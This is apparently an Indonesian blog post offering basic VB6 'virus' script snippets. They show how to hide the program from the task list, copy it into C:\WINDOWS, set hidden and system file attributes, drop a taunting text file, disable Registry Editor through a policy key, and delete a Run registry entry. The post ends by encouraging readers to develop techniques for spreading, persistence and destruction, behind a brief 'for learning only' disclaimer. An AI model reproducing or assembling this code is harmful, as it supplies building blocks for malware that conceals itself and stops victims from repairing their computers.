script dasar virus dengan VB6

1. Menyembunyikan  Form

Private Sub Form_Load()
App.TaskVisible = False
End Sub

2. Mengcopy Diri Sendiri

On Error Resume Next
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\nama_virus.exe”

3. Bikin Direktori ato folder

On Error Resume Next
MkDir “C:\WINDOWS\virus”

4. Mengganti Atribut file
Bisa juga buat ngganti atribut folder
Attributes = 0 0 berarti normal
Attributes = 1 1 berarti read only
Attributes = 2 2 berarti hidden
Attributes = 3 3 berarti read only + hidden
Attributes = 4 4 berarti system
Attributes = 5 5 berarti system + read only
Attributes = 6 6 berarti system + hidden

Set sembunyi = CreateObject(”Scripting.FileSystemObject”)
On Error Resume Next
sembunyi.GetFile(”C:\WINDOWS\nama_virus.exe”).Attributes = 2

tapi kalo folder pakenya
sembunyi.GetFolder(”C:\WINDOWS\”).Attributes = 2

5. Bikin Pesan Virus
Bikin pesen pake text file

On Error Resume Next
Set bikinpesen = CreateObject(”Scripting.FileSystemObject”)
Set isipesen = bikinpesen.Createtextfile(”C:\bokep.txt “)
isipesen.writeline (”kapok..cari bokep sendiri napa “)
isipesen.Close

6.Ngubah Registry
Misalnya mo disable regedit

On Error Resume Next
Set ubahreg = CreateObject(”WScript.Shell”)
ubahreg.regwrite “HKEY_CURRENT_USER\software\
microsoft\windows\currentversion\policies\system\
disableregistrytools”, 1, “REG_DWORD”

7.Menghapus Registry
Misalna mo ngehapus HKEY_LOCAL_MACHINE\
Software\Microsoft\Windows NT\CurrentVersion\Run\ServLogon

On Error Resume Next
Set hapusreg = CreateObject(”WScript.Shell”)
hapusreg.regdelete “HKEY_LOCAL_MACHINE\
Software\Microsoft\Windows NT\CurrentVersion\Run\ServLogon”

klo uda tau dasar kerjanya gmn, selanjutnya kembangkan sendiri, msh byk script2 lain dan teknik2 lain untuk penyebaran, pertahanan dan pengrusakan.

script ini hanya sebagai bahan pembelajaran saja, mohon tidak di salah gunakan ya.

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s